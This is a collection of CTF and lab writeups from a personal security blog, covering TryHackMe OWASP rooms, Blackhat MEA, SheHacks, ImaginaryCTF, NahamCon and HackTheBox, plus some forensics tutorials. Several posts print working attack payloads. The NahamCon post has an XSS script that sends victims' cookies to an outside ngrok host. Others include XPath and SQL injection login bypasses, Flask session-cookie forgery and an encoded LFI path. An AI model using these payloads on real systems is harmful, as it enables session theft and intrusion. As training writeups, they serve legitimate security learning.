THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl} XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b Broken Access Control (IDOR Challenge) 1 2 3 4 5 6 7 8 9 10 11 12 Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree} Security Misconfiguration 1 2 3 4 5 6 7 8 9 10 Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17} XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. websites_can_be_easily_defaced_with_xss Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 11 Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? 
denial of service Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 12 1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag} Insecure Deserialization - Code Execution 1 2 3 4 5 6 7 flag.txt 4a69a7ff9fd68 Components with know vulns 1 2 3 4 5 6 7 8 9 How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611 Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 11 What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. 
To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 //registration if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp } With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 6 user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1 So i sent the request for registration with the password as two smileys and login with the same password. 
In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 6 7 curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login The ctf was great and see you in the next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\n web category\n Graph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 2 {__schema{types{name,fields{name}}}} You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . 
It was base64 encoded , so we decode it to get the flag\n X marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1 SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 2 \u0026#39;or 1=1 or\u0026#39; this is able to bypass login and i get the result\n1 2 {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;} to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 2 \u0026#39;or position()=3 or\u0026#39; by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 2 {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;} secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. 
For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 4 flask-unsign --decode --cookie \u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;} We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 5 6 flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\n forensics category\n SnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\n Sniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\n SnifferDog3 What version of Jenkins is running on 192.168.56.103? 
shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\n SnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n ","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n 1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 3 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n 2. 
chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7 Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3} Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 3 ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 3 ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/ You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. 
The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 3 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\n Idoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 12 if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo 
\u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } } it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\n Blank This challenge tested knowledge is sql.\n1 2 3 db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; { as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 5 app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); } THe username had to be \u0026ldquo;admin\u0026rdquo;. 
so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5 if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;); Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image() you also have to run the following command to set the exit data\n1 2 3 exiftool 
-PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\n Login This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 5 pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 6 xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34; Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . 
I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n ","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1 How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\n What is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\n Which city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\n How many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\n What is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\n What machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\n What is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\n What was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. 
The MAC address is on the blue line I have highlighted:\n What email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\n DEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\n The above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. 
Read more here\nwe can use this sql statement to get the blob\n1 2 3 select data from blobber where id=238 Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\n ninety one In this challenge you are provided with an encoded string\n1 @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2 flag{dfb88c7d9ca38e71dc27e1072fc43d1b} glasses This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 3 flag{8084e4530cf649814456f2a291eb81e9} web category starwars In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 7 \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt; the flag will be returned in base64 format. 
Use it in the browser to access /admin page and the flag\n misc category zombies In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 2 adb install jninjaspeak.apk Decompile the application using apktool\n1 2 3 4 use : apktool -r -s d jninjaspeak.apk We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\n Fortune teller For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. 
Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\n wheres waldo In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 5 mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute(); the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import requests def calculate_distance(latitude, longitude): url = 
f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move() The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 5 lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 5 Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9 final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 3 open port 22 open port 50015 a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. 
I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 2 \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for built-in operation\u0026#34; I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]} I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13 +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+ We can login to ssh as the user sau. 
